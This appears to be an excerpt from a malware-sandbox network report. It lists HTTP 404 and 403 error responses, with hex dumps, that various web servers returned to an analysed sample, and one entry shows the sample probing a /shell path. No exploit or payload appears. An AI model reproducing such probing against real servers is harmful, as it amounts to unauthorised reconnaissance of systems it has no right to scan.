Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1566Date: Mon, 01 Nov 2021 09:09:41 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:09:41 GMTServer: Apache/2.4.46 (FreeBSD) OpenSSL/1.0.2s-freebsd PHP/5.6.30 mod_perl/2.0.11 Perl/v5.32.0Content-Length: 196Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:09:41 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 271Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at 127.0.0.1 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiDate: Mon, 01 Nov 2021 09:09:41 GMTServer: Microsoft-HTTPAPI/2.0Content-Length: 315Connection: CloseData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:09:45 GMTServer: ApacheLast-Modified: Wed, 09 Jan 2019 14:14:03 GMTETag: "70e-57f0712ff7ff5"Accept-Ranges: bytesContent-Length: 1806Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 20 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 34 34 34 34 34 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 45 45 45 45 45 45 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 54 72 65 62 75 63 68 65 74 20 4d 53 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 38 30 25 3b 0a 20 20 20 20 7d 0a 20 20 20 20 68 31 20 7b 7d 0a 20 20 20 20 68 32 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 32 65 6d 3b 20 7d 0a 20 20 20 20 23 70 61 67 65 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 36 30 25 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 32 34 70 78 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 32 70 78 3b 0a 20 20 20 20 7d 0a 20 20 20 20 23 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 70 78 20 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 7d 0a 20 20 20 20 2e 73 74 61 74 75 73 33 78 78 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 37 35 30 37 36 3b 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 2e 73 74 61 74 75 73 34 78 78 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 43 35 35 30 34 32 3b 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 2e 73 74
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1566Date: Mon, 01 Nov 2021 09:09:45 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: application/json; charset=utf-8Date: Mon, 01 Nov 2021 09:09:45 GMTContent-Length: 52Data Raw: 7b 22 63 6f 64 65 22 3a 22 50 41 47 45 5f 4e 4f 54 5f 46 4f 55 4e 44 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 22 7d Data Ascii: {"code":"PAGE_NOT_FOUND","message":"Page not found"}
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 01 Nov 2021 09:09:45 GMTCache-Control: no-cachePragma: no-cacheContent-Type: text/html; charset="UTF-8"Content-Length: 68689Via: HTTP/1.1 forward.http.proxy:3128Connection: keep-aliveData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 75 74 66 2d 38 27 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 42 6c 6f 63 6b 65 64 20 73 69 74 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 40 63 68 61 72 73 65 74 20 27 75 74 66 2d 38 27 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 20 20 20 20 20 20 20 20 20 7b 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 27 2c 27 48 65 6c 76 65 74 69 63 61 27 2c 27 53 65 67 6f 65 20 55 49 27 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 63 6f 6c 6f 72 3a 23 35 63 35 63 35 63 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 61 66 61 66 61 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 36 39 61 64 35 3b 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 66 6f 63 75 73 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 20 6f 75 74 6c 69 6e 65 3a 20 6e 6f 6e 65 3b 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 20 63 6f 6c 6f 72 3a 20 23 38 37 38 62 39 37 3b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 2e 62 75 74 74 6f 6e 20 20 20 20 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 45 39 46 46 34 3b 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2e 62 75 74 74 6f 6e 72 6f 77 20 20 20 20 20 20 20 20 20 20 7b 20 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 20 77 69 64 74 68 3a 20 31 30 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2e 63 75 73 74 6f 6d 63 6f 6e 74 65 6e 74 20 20 20 20 20 20 7b 20 66 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.12.0Date: Mon, 01 Nov 2021 09:09:45 GMTContent-Type: text/htmlContent-Length: 169Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.12.0</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 01 Nov 2021 09:09:45 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:09:45 GMTServer: ApacheVary: Accept-EncodingContent-Length: 276Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 4f 4e 54 45 4e 54 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p></body></html>
